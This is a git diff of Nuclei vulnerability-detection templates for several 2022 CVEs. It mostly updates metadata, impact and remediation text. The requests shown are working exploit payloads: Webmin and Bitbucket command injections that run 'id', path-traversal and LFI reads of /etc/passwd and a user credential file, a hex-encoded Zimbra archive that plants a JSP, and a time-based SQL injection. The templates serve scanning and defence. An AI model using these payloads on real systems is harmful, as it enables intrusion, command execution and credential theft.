cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: glpi-project - product: glpi shodan-query: http.favicon.hash:"-1474875778" - tags: cve,cve2022,glpi,rce,kev,glpi-project + verified: "true" + tags: cve,cve2022,glpi,rce + variables: cmd: "cat+/etc/passwd" -http: +requests: - raw: - | POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 @@ -54,4 +44,3 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e6859ca0826caafa4dc545ef1248adebca25f472c0e3188fb46cd23a4dd3bfc0022100ae9f408351c828c91bf99522202d215eabc284c86bcc9abb16c786e316ac0ebc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-36446.yaml b/nuclei-templates/CVE-2022/CVE-2022-36446.yaml index 6bab79c95b..2e554033b9 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-36446.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-36446.yaml @@ -1,20 +1,37 @@ id: CVE-2022-36446 info: - name: Webmin - Remote Code Execution (Authenticated) + name: Webmin <1.997 - Authenticated Remote Code Execution author: gy741 severity: critical description: | - Webmin before 1.997 is vulnerable to RCE exploits. an authenticated, remote attacker to perform command injection attacks. + Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system. + remediation: | + Upgrade Webmin to version 1.997 or later to mitigate this vulnerability. reference: - https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165 - https://www.exploit-db.com/exploits/50998 + - https://github.com/webmin/webmin/compare/1.996...1.997 - https://nvd.nist.gov/vuln/detail/CVE-2022-36446 + - http://packetstormsecurity.com/files/167894/Webmin-1.996-Remote-Code-Execution.html classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-36446 - tags: cve,cve2022,webmin,rce,authenticated + cwe-id: CWE-116 + epss-score: 0.97131 + epss-percentile: 0.99752 + cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: webmin + product: webmin + shodan-query: title:"Webmin" + tags: cve,cve2022,packetstorm,webmin,rce,authenticated,edb -requests: +http: - raw: - | POST /session_login.cgi HTTP/1.1 @@ -22,7 +39,6 @@ requests: Content-Type: application/x-www-form-urlencoded user={{username}}&pass={{password}} - - | POST /package-updates/update.cgi HTTP/1.1 Host: {{Hostname}} @@ -30,7 +46,6 @@ requests: mode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -45,3 +60,4 @@ requests: - type: status status: - 200 +# digest: 4b0a00483046022100c00ba6d3cd5e3419f477ba4f1c6636a9a6527a59b9c3b11b6947953d18b99fff022100b6882779caab224e10ac09ce3d14a50090914c62c5248a1f2cc556ba1c3cb21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-36537.yaml b/nuclei-templates/CVE-2022/CVE-2022-36537.yaml index d175442b95..95d822f1fc 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-36537.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-36537.yaml @@ -6,26 +6,37 @@ info: severity: high description: | ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + The vulnerability can lead to the exposure of sensitive data, such as credentials or internal system information. + remediation: | + Apply the latest security patches or updates provided by the ZK Framework to fix the information disclosure vulnerability. reference: - https://github.com/Malwareman007/CVE-2022-36537/ - https://tracker.zkoss.org/browse/ZK-5150 - https://nvd.nist.gov/vuln/detail/CVE-2022-36537 + - https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-zk-java-framework-rce-flaw/ + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-36537 cwe-id: CWE-200 + epss-score: 0.95859 + epss-percentile: 0.99401 + cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: zkoss + product: zk_framework shodan-query: http.title:"Server backup manager" - verified: "true" - tags: cve,cve2022,zk-framework,exposure,unauth + tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss -requests: +http: - raw: - | GET /login.zul HTTP/1.1 Host: {{Hostname}} - - | POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1 Host: {{Hostname}} @@ -40,16 +51,17 @@ requests: /WEB-INF/web.xml ------WebKitFormBoundaryCs6yB0zvpfSBbYEp-- - cookie-reuse: true matchers-condition: and matchers: - type: regex part: body regex: - - ".*" - - "((.|\n)*)welcome-file-list>" - - "xml version" - - "web-app" + - .* + - |- + ((.| + )*)welcome-file-list> + - xml version + - web-app condition: and - type: status @@ -63,5 +75,4 @@ requests: regex: - "dt:'(.*?)',cu:" internal: true - -# Enhanced by md on 2023/02/03 +# digest: 4a0a0047304502202cfa133f395dd683e1024de424de18fd3f12ff8a827f399357055226d7b8644c022100b0f39d19405888c00c5f79a616f6d8b3424a5f58b8ddfc5d37ad214eecdb917b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-36553.yaml b/nuclei-templates/CVE-2022/CVE-2022-36553.yaml index e5300b39e6..02820f6e49 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-36553.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-36553.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-36553 cwe-id: CWE-77 - epss-score: 0.18047 - epss-percentile: 0.95653 + epss-score: 0.46383 + epss-percentile: 0.9713 cpe: cpe:2.3:o:hytec:hwl-2511-ss_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: hwl-2511-ss_firmware fofa-query: title="index" && header="lighttpd/1.4.30" zoomeye-query: app:"Hytec Inter HWL-2511-SS" - tags: cve,cve2022,hytec,rce + tags: cve2022,cve,hytec,rce http: - raw: @@ -61,4 +61,4 @@ http: - "status_code == 200" - "contains(body_1, 'index')" condition: and -# digest: 4a0a00473045022100eca14458cebc532a203f1e35cfeaceb1fc6d35f3f3d3667f58552f27b3c1dd1302207aa08ecc7c55835b1f9f9dc8e84d9efd0795c1386599e680955e88bdd89c2e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eddd73199d20d259afa36f518385d2c6a5599db2a684123eb18b7465e35fadc702206d28ba1a993f628e7c45c6a2d82068bfb3c9c72e11e0ca8201a4ef233da38969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-36642.yaml b/nuclei-templates/CVE-2022/CVE-2022-36642.yaml index 00cfd40bce..3e07bba2f3 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-36642.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-36642.yaml @@ -6,33 +6,41 @@ info: severity: critical description: | Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Omnia MPX. reference: - https://www.exploit-db.com/exploits/50996 - https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd - https://nvd.nist.gov/vuln/detail/CVE-2022-36642 + - https://www.telosalliance.com/radio-processing/audio-interfaces/omnia-mpx-node classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-36642 cwe-id: CWE-862 + epss-score: 0.68515 + epss-percentile: 0.97692 + cpe: cpe:2.3:o:telosalliance:omnia_mpx_node_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: telosalliance + product: omnia_mpx_node_firmware shodan-query: http.title:"Omnia MPX Node | Login" - verified: "true" - tags: traversal,omnia,edb,cve,cve2022,lfi + tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance -requests: +http: - method: GET path: - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json" stop-at-first-match: true + matchers-condition: or matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: word part: body words: @@ -42,4 +50,7 @@ requests: - '"roleUser":' condition: and -# Enhanced by mp on 2023/01/15 + - type: regex + regex: + - "root:[x*]:0:0" +# digest: 4a0a0047304502204c76827983086116cc5105ff1864cbc06f821b5e018567ec977226dbf0a96123022100a99892b0c629088eeb4bd82f6815df89a5d0460b742da6fd5e24924e1a44cca0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-36804.yaml b/nuclei-templates/CVE-2022/CVE-2022-36804.yaml index c2926b7872..6200beeadd 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-36804.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-36804.yaml @@ -1,66 +1,77 @@ id: CVE-2022-36804 info: - name: Atlassian Bitbucket Command Injection Vulnerability + name: Atlassian Bitbucket - Remote Command Injection author: DhiyaneshDk,tess,sullo severity: high description: | - Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. + Atlassian Bitbucket Server and Data Center is susceptible to remote command injection. Multiple API endpoints can allow an attacker with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request, thus making it possible to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. + remediation: | + Apply the latest security patches provided by Atlassian to mitigate the vulnerability. reference: - https://github.com/notdls/CVE-2022-36804 - - https://nvd.nist.gov/vuln/detail/CVE-2022-36804 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804 - https://jira.atlassian.com/browse/BSERV-13438 + - https://nvd.nist.gov/vuln/detail/CVE-2022-36804 + - http://packetstormsecurity.com/files/171453/Bitbucket-7.0.0-Remote-Command-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-36804 cwe-id: CWE-77 + epss-score: 0.97343 + epss-percentile: 0.99886 + cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* metadata: + max-request: 2 + vendor: atlassian + product: bitbucket shodan-query: http.component:"BitBucket" - tags: cve,cve2022,bitbucket,atlassian,kev - + tags: cve,cve2022,packetstorm,bitbucket,atlassian,kev variables: data: '{{rand_base(5)}}' -requests: +http: - raw: - | GET /rest/api/latest/repos HTTP/1.1 Host: {{Hostname}} - - | GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1 Host: {{Hostname}} + stop-at-first-match: true iterate-all: true + + matchers-condition: and + matchers: + - type: word + words: + - "com.atlassian.bitbucket.scm.CommandFailedException" + + - type: status + status: + - 500 + extractors: - type: json # type of the extractor - part: body name: key + internal: true json: - '.["values"] | .[] | .["project"] | .key' - internal: true - - - type: json # type of the extractor part: body + + - type: json name: slug + internal: true json: - '.["values"] | .[] | .slug' - internal: true + part: body - type: regex group: 1 regex: - 'uid=.*\(([a-z]+)\):' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "com.atlassian.bitbucket.scm.CommandFailedException" - - - type: status - status: - - 500 \ No newline at end of file +# digest: 4a0a0047304502207f05b6fa75f5b18f40fc9cc67c652ba6c7601a227fe47e0bb3a03972933cabf30221009e3c19b251fb9154d5ade0ac96346cf96e5f9d320a6b1322a5a54fb104555e6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-36883.yaml b/nuclei-templates/CVE-2022/CVE-2022-36883.yaml new file mode 100644 index 0000000000..2be945f370 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-36883.yaml @@ -0,0 +1,27 @@ +id: CVE-2022-36883 +info: + name: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. + severity: high + author: c-sh0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-36883 + - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.5 + cve-id: CVE-2022-36883 + cwe-id: CWE-862 + tags: cve,cve2022,jenkins,plugin,git,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '{{randstr}}' diff --git a/nuclei-templates/CVE-2022/CVE-2022-37042.yaml b/nuclei-templates/CVE-2022/CVE-2022-37042.yaml index 540cb67669..e66a2899cb 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-37042.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-37042.yaml @@ -6,22 +6,31 @@ info: severity: critical description: | Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite. reference: - https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/ - https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/ - https://github.com/vnhacker1337/CVE-2022-27925-PoC - https://nvd.nist.gov/vuln/detail/CVE-2022-37042 + - https://wiki.zimbra.com/wiki/Security_Center classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-37042 - cwe-id: CWE-287 + cwe-id: CWE-22 + epss-score: 0.97539 + epss-percentile: 0.99994 + cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* metadata: - fofa-query: app="zimbra-邮件系统" + max-request: 4 + vendor: zimbra + product: collaboration shodan-query: http.favicon.hash:"1624375939" + fofa-query: app="zimbra-邮件系统" tags: cve,cve2022,zimbra,rce,unauth,kev -requests: +http: - raw: - | POST {{path}} HTTP/1.1 @@ -30,7 +39,6 @@ requests: content-type: application/x-www-form-urlencoded {{hex_decode("504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000")}} - - | GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 Host: {{Hostname}} @@ -41,7 +49,6 @@ requests: - /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd stop-at-first-match: true - req-condition: true matchers: - type: dsl dsl: @@ -49,5 +56,4 @@ requests: - 'status_code_2 == 200' - "contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')" condition: and - -# Enhanced by mp on 2022/10/06 \ No newline at end of file +# digest: 490a004630440220174e125afd24ffd46b83dc8fbd16ba76bac1f9c389dcf41df028a42b438df438022062eb429750f3554a28c017e74167a82a4023aa672bf4059f0bc3e2e444886d8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-37153.yaml b/nuclei-templates/CVE-2022/CVE-2022-37153.yaml index 5ef1b9aa8c..b22c9cf9a6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-37153.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-37153.yaml @@ -6,20 +6,31 @@ info: severity: medium description: | Artica Proxy 4.30.000000 contains a cross-site scripting vulnerability via the password parameter in /fw.login.php. + remediation: | + Upgrade to a patched version of Artica Proxy or apply the vendor-supplied patch to mitigate the vulnerability. reference: - https://github.com/Fjowel/CVE-2022-37153 - https://nvd.nist.gov/vuln/detail/CVE-2022-37153 + - https://github.com/SYRTI/POC_to_review + - https://github.com/WhooAmii/POC_to_review + - https://github.com/k0mi-tg/CVE-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-37153 cwe-id: CWE-79 + epss-score: 0.0013 + epss-percentile: 0.47096 + cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: articatech + product: artica_proxy shodan-query: http.html:"Artica" - verified: "true" - tags: cve,cve2022,xss,artica + tags: cve,cve2022,xss,artica,articatech -requests: +http: - raw: - | POST /fw.login.php HTTP/1.1 @@ -45,5 +56,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 4b0a00483046022100df0431683f7ff338969210c72a2895dd79303bff523433299b1dc2074c65ffe102210086ecf0af9d7d5b544b35d85c2af4279bb4f62ed131ac6bf93e84e32089f02d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-37190.yaml b/nuclei-templates/CVE-2022/CVE-2022-37190.yaml index 5e58503c65..2676a9c412 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-37190.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-37190.yaml @@ -6,25 +6,28 @@ info: severity: high description: | CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from "/api/index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or update to a patched version of Cuppa CMS v1.0 to mitigate this vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-37190 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-37190 cwe-id: CWE-732 epss-score: 0.02018 - epss-percentile: 0.87631 + epss-percentile: 0.8771 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: cuppacms product: cuppacms - tags: cve,cve2022,rce,cuppa,authenticated + tags: cve2022,cve,rce,cuppa,authenticated,cuppacms http: - raw: @@ -71,4 +74,4 @@ http: regex: - "(.*?)" internal: true -# digest: 490a00463044022052364943e2085295765fa8dda2e0085f7085dee0f9b705bdfb2eb6700e655e6e0220022ad2b5768861333782b08cc9a9d067f0d7e75c24ac9b8b631ed97ce6ca5042:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022053679076bc7557501e02d91d43aef620a97ae250150ec9582e38ba855f404c6c022100c8428d2b76fa3b6dc76a6218b76fe10761ac009d56feb84be0cddc2a9f54cfa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-37191.yaml b/nuclei-templates/CVE-2022/CVE-2022-37191.yaml index 63b8d1cff9..6cd220e036 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-37191.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-37191.yaml @@ -6,25 +6,28 @@ info: severity: medium description: | The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution. remediation: | Apply the latest security patches or updates provided by the vendor to fix the authenticated local file inclusion vulnerability in Cuppa CMS v1.0. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-37191 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-37191 cwe-id: CWE-829 - epss-score: 0.36609 - epss-percentile: 0.96785 + epss-score: 0.46328 + epss-percentile: 0.97122 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa,authenticated + tags: cve,cve2022,lfi,cuppa,authenticated,cuppacms http: - raw: @@ -71,4 +74,4 @@ http: regex: - "(.*?)" internal: true -# digest: 4a0a0047304502207967dff4b0af816ef8463829913b8096f975b6a3bc0a90b13622439c370285c8022100f55f9487a8ce9913c77bf85f0a3be2710dfdc84471ac0e18e35100505e258d90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100904cc1a592552a2c9efd1a803e2a5a5680978eedc314a4ec299062cd14edb5a4022100fd7b972b8ba3218b82bbd8a155497cf3d8d1b67134bdc2b3579f6f06970e0aea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-37299.yaml b/nuclei-templates/CVE-2022/CVE-2022-37299.yaml index d643281547..09f3c6f08e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-37299.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-37299.yaml @@ -5,20 +5,32 @@ info: author: pikpikcu severity: medium description: Shirne CMS 1.2.0 is vulnerable to local file inclusion which could cause arbitrary file read via /static/ueditor/php/controller.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. + remediation: | + Upgrade to the latest version of Shirne CMS or apply the vendor-provided patch to mitigate the LFI vulnerability. reference: - https://twitter.com/pikpikcu/status/1568316864690028544 - https://gitee.com/shirnecn/ShirneCMS/issues/I5JRHJ?from=project-issue - https://nvd.nist.gov/vuln/detail/CVE-2022-37299 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-37299 cwe-id: CWE-22 + epss-score: 0.00772 + epss-percentile: 0.80878 + cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2022,shirnecms,lfi + verified: true + max-request: 1 + vendor: shirne_cms_project + product: shirne_cms + tags: cve,cve2022,shirnecms,lfi,shirne_cms_project -requests: +http: - method: GET path: - "{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test" @@ -38,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 4b0a0048304602210094bc65c10f89d2bb9c87686eba12f012554fc0ce21425c4d59230a1d8de5f4a9022100cf813f36fe3c9da4e06e3a7ee76fc66362ee7b3a792eba20f1c7d6f5abc0c98d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3768.yaml b/nuclei-templates/CVE-2022/CVE-2022-3768.yaml index ab9468c668..38ea791bf2 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3768.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3768.yaml @@ -6,21 +6,32 @@ info: severity: high description: | WordPress WPSmartContracts plugin before 1.3.12 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker with a role as low as author can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: Fixed in version 1.3.12 reference: - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768 - https://cve.report/CVE-2022-3768 - remediation: Fixed in version 1.3.12. + - https://bulletin.iese.de/post/wp-smart-contracts_1-3-11/ + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-3768 cwe-id: CWE-89 + epss-score: 0.01715 + epss-percentile: 0.86512 + cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp-smart-contracts,authenticated,cve,wordpress,wp,sqli,cve2022,wp-plugin,wpscan + verified: true + max-request: 2 + vendor: wpsmartcontracts + product: wpsmartcontracts + framework: wordpress + tags: cve,cve2022,wp-smart-contracts,wpscan,wp-plugin,sqli,wordpress,wp,authenticated,wpsmartcontracts -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -32,17 +43,16 @@ requests: log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | - GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1 + @timeout: 15s + GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&uid=1 HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers: - type: dsl dsl: - - 'duration_2>=5' + - 'duration_2>=7' - 'status_code_2 == 200' - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Batch Mint NFTs")' condition: and - -# Enhanced by md on 2023/01/06 +# digest: 4b0a00483046022100bd925a5d0628000976660fe729e42a7f314f002bfb6407b82e26f1b090b62a4d022100b482d42c6c8674fb3ced86981e2df21831b145496f590b50dec1531c3d60d471:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3800.yaml b/nuclei-templates/CVE-2022/CVE-2022-3800.yaml index 293a8c8d81..0e1e14bfce 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3800.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3800.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IBAX go-ibax functionality is susceptible to SQL injection via the file /api/v2/open/rowsInfo. The manipulation of the argument table_name leads to SQL injection, and the attack may be launched remotely. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and 